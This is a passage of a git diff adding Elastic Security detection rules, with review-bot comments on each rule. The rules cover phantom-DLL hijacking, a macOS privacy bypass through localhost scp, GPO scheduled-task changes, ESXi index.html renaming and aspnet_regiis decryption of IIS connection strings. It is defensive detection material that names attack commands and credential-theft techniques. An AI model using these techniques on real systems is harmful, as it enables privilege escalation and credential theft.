a custom ingest 
pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.001", + "name": "DLL Search Order Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee_110", + "type": "security-rule" +} \ No newline at end of 
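Review bot: The `"description"` and the triage guide in `"note"` both say the rule catches a "non Microsoft signed DLL", but neither branch of the `"query"` checks the signer: the Endpoint branch only requires `?dll.code_signature.trusted != true or ?dll.code_signature.exists != true`, and the Sysmon branch excludes anything with `file.code_signature.status == "Valid"`, so a phantom DLL signed with any certificate the host trusts (including an attacker's own purchased or stolen code-signing cert) is silently excluded. Either soften the description to "unsigned or untrusted-signed DLL", or tighten the Endpoint exclusion to a Microsoft subject, e.g. `not (?dll.code_signature.trusted == true and ?dll.code_signature.subject_name : "Microsoft *")` — whether Endpoint library events populate `subject_name` reliably is not visible from this hunk, so confirm before changing it. The three hard-coded `file.hash.sha256` exclusions carry no explanation; a sentence in `"note"` or `"setup"` naming what they are (presumably known-good `wbemcomn.dll` builds, given the adjacent `file.path` exclusion) would let maintainers prune them safely later.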
file diff --git a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_111.json b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_111.json new file mode 100644 index 00000000000..1042524f3eb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_111.json 
@@ -0,0 +1,179 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the loading of a non Microsoft signed DLL that is missing on a default Windows install (phantom DLL) or one that can be loaded from a different location by a native Windows process. This may be abused to persist or elevate privileges via privileged file write vulnerabilities.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.library*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious DLL Loaded for Persistence or Privilege Escalation", + "note": "## Triage and analysis\n\n### Investigating Suspicious DLL Loaded for Persistence or Privilege Escalation\n\nAttackers can execute malicious code by abusing missing modules that processes try to load, enabling them to escalate privileges or gain persistence. This rule identifies the loading of a non-Microsoft-signed DLL that is missing on a default Windows installation or one that can be loaded from a different location by a native Windows process.\n\n#### Possible investigation steps\n\n- Examine the DLL signature and identify the process that created it.\n - Investigate any abnormal behaviors by the process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve the DLL and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in 
resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "any where host.os.type == \"windows\" and\n (event.category : (\"driver\", \"library\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (\n /* compatible with Elastic Endpoint Library Events */\n (?dll.name : (\"wlbsctrl.dll\", \"wbemcomn.dll\", \"WptsExtensions.dll\", \"Tsmsisrv.dll\", \"TSVIPSrv.dll\", \"Msfte.dll\",\n \"wow64log.dll\", \"WindowsCoreDeviceInfo.dll\", \"Ualapi.dll\", \"wlanhlp.dll\", \"phoneinfo.dll\", \"EdgeGdi.dll\",\n \"cdpsgshims.dll\", \"windowsperformancerecordercontrol.dll\", \"diagtrack_win.dll\", \"oci.dll\", \"TPPCOIPW32.dll\", \n \"tpgenlic.dll\", \"thinmon.dll\", \"fxsst.dll\", \"msTracer.dll\")\n and (?dll.code_signature.trusted != true or ?dll.code_signature.exists != true)) or\n\n /* compatible with Sysmon EventID 7 - Image Load */\n (file.name : (\"wlbsctrl.dll\", \"wbemcomn.dll\", \"WptsExtensions.dll\", \"Tsmsisrv.dll\", \"TSVIPSrv.dll\", \"Msfte.dll\",\n \"wow64log.dll\", \"WindowsCoreDeviceInfo.dll\", \"Ualapi.dll\", \"wlanhlp.dll\", \"phoneinfo.dll\", \"EdgeGdi.dll\",\n \"cdpsgshims.dll\", \"windowsperformancerecordercontrol.dll\", \"diagtrack_win.dll\", \"oci.dll\", \"TPPCOIPW32.dll\", \n \"tpgenlic.dll\", \"thinmon.dll\", \"fxsst.dll\", \"msTracer.dll\") and \n not file.path : (\"?:\\\\Windows\\\\System32\\\\wbemcomn.dll\", \"?:\\\\Windows\\\\SysWOW64\\\\wbemcomn.dll\") and \n not file.hash.sha256 : \n (\"6e837794fc282446906c36d681958f2f6212043fc117c716936920be166a700f\", \n \"b14e4954e8cca060ffeb57f2458b6a3a39c7d2f27e94391cbcea5387652f21a4\", \n 
\"c258d90acd006fa109dc6b748008edbb196d6168bc75ace0de0de54a4db46662\") and \n not file.code_signature.status == \"Valid\")\n )\n", + "references": [ + "https://itm4n.github.io/windows-dll-hijacking-clarified/", + "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", + "https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html", + "https://shellz.club/2020/10/16/edgegdi-dll-for-persistence-and-lateral-movement.html", + "https://windows-internals.com/faxing-your-way-to-system/", + "http://waleedassar.blogspot.com/2013/01/wow64logdll.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "dll.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.hash.sha256", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest 
pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.001", + "name": "DLL Search Order Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee_111", + "type": "security-rule" +} \ No newline at end of 
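Review bot: The Sysmon branch of `query` allowlists three literal `file.hash.sha256` values with nothing on the page recording which binaries they belong to, so the exclusion cannot be audited or retired once those builds age out. Since the JSON carries no comments, the identity and reason for each hash belongs in the `note` investigation guide (or in the rule's upstream source), and the two `file.path` exclusions for `wbemcomn.dll` deserve the same one-line justification. The two data-source branches also test signatures differently (`?dll.code_signature.trusted != true or ?dll.code_signature.exists != true` for Endpoint, `not file.code_signature.status == "Valid"` for Sysmon); if that asymmetry is deliberate, a sentence in `note` saying so would keep the next maintainer from "fixing" it.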
file diff --git a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_107.json b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_107.json new file mode 100644 index 00000000000..a2d720c84cf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_107.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the Secure Copy Protocol (SCP) to copy files locally by abusing the auto addition of the Secure Shell Daemon (sshd) to the authorized application list for Full Disk Access. This may indicate attempts to bypass macOS privacy controls to access sensitive files.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privacy Control Bypass via Localhost Secure Copy", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name:\"scp\" and\n process.args:\"StrictHostKeyChecking=no\" and\n process.command_line:(\"scp *localhost:/*\", \"scp *127.0.0.1:/*\") and\n not process.args:\"vagrant@*127.0.0.1*\"\n", + "references": [ + "https://www.trendmicro.com/en_us/research/20/h/xcsset-mac-malware--infects-xcode-projects--uses-0-days.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_108.json b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_108.json new file mode 100644 index 00000000000..9609a043321 --- /dev/null 
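Review bot: This rule carries `risk_score` 73 and `severity` high but ships with no `note` field, so analysts get no triage guidance, no false-positive analysis, and no explanation of the `not process.args:"vagrant@*127.0.0.1*"` exclusion, whereas the other high-severity rule in this batch (bfeaf89b) has a full `## Triage and analysis` section. Suggest adding a `note` that explains why a localhost `scp` invocation with `StrictHostKeyChecking=no` is treated as a privacy-control bypass on macOS, which legitimate tooling (Vagrant) is expected to trigger it, and how to verify what was copied, and then adding the `Resources: Investigation Guide` tag the other rules use.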
+++ b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_108.json 
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the creation or modification of a new Group Policy based scheduled task or service. These methods are used for legitimate system administration, but can also be abused by an attacker with domain admin permissions to execute a malicious payload remotely on all or a subset of the domain joined machines.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation or Modification of a new GPO Scheduled Task or Service", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.path : (\"?:\\\\Windows\\\\SYSVOL\\\\domain\\\\Policies\\\\*\\\\MACHINE\\\\Preferences\\\\ScheduledTasks\\\\ScheduledTasks.xml\",\n \"?:\\\\Windows\\\\SYSVOL\\\\domain\\\\Policies\\\\*\\\\MACHINE\\\\Preferences\\\\Services\\\\Services.xml\") and\n not process.name : \"dfsrs.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "c0429aa8-9974-42da-bfb6-53a0a515a145", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1484", + "name": "Domain Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/", + "subtechnique": [ + { + "id": "T1484.001", + "name": "Group Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "c0429aa8-9974-42da-bfb6-53a0a515a145_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_109.json b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_109.json new file mode 100644 index 00000000000..81ce9df4c36 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_109.json 
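Review bot: The `file.path` patterns in `query` only cover the `MACHINE\Preferences` side of the GPO tree; Group Policy Preferences presumably also store scheduled tasks under the `USER` side of a policy, so user-configuration tasks would not be matched — either extend the pattern list or state in `description` that only computer-configuration tasks and services are covered. The `not process.name : "dfsrs.exe"` exclusion is by name alone; pairing it with `process.executable` restricted to the DFS Replication service's expected System32 path would keep the exclusion from being satisfied by any process that merely carries that name. The same query appears unchanged in the c0429aa8-..._109.json hunk below, which differs only in its `index` list.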
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the creation or modification of a new Group Policy based scheduled task or service. These methods are used for legitimate system administration, but can also be abused by an attacker with domain admin permissions to execute a malicious payload remotely on all or a subset of the domain joined machines.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation or Modification of a new GPO Scheduled Task or Service", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.path : (\"?:\\\\Windows\\\\SYSVOL\\\\domain\\\\Policies\\\\*\\\\MACHINE\\\\Preferences\\\\ScheduledTasks\\\\ScheduledTasks.xml\",\n \"?:\\\\Windows\\\\SYSVOL\\\\domain\\\\Policies\\\\*\\\\MACHINE\\\\Preferences\\\\Services\\\\Services.xml\") and\n not process.name : \"dfsrs.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "c0429aa8-9974-42da-bfb6-53a0a515a145", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1484", + "name": "Domain Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/", + "subtechnique": [ + { + "id": "T1484.001", + "name": "Group Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "c0429aa8-9974-42da-bfb6-53a0a515a145_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_6.json b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_6.json new file mode 100644 index 00000000000..55a955e7911 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_6.json 
@@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where the \"index.html\" file within the \"/usr/lib/vmware/*\" directory is renamed on a Linux system. The rule monitors for the \"rename\" event action associated with this specific file and path, which could indicate malicious activity.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Renaming of ESXI index.html File", + "query": "file where host.os.type == \"linux\" and event.action == \"rename\" and file.name : \"index.html\" and\nfile.Ext.original.path : \"/usr/lib/vmware/*\"\n", + "references": [ + "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.original.path", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c125e48f-6783-41f0-b100-c3bf1b114d16", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "c125e48f-6783-41f0-b100-c3bf1b114d16_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_109.json b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_109.json new file mode 100644 index 00000000000..9c36063d2ce --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_109.json 
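Review bot: The `setup` text links to a version-pinned guide, `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, while the same boilerplate in the c02c8b9f-..._107.json hunk above uses `https://www.elastic.co/guide/en/fleet/current/agent-policy.html`; the pinned link will go stale and should be changed to `current` for consistency. Separately, `file.Ext.original.path` is declared with `"ecs": false` and `"type": "unknown"`; a short clause in `description` noting that the rule depends on this Elastic Defend-specific field would make the data-source dependency explicit to anyone who tries to run the rule against other Linux file-event sources.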
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Microsoft IIS Connection Strings Decryption", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"aspnet_regiis.exe\" or ?process.pe.original_file_name == \"aspnet_regiis.exe\") and\n process.args : \"connectionStrings\" and process.args : \"-pdf\"\n", + "references": [ + "https://blog.netspi.com/decrypting-iis-passwords-to-break-out-of-the-dmz-part-1/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, 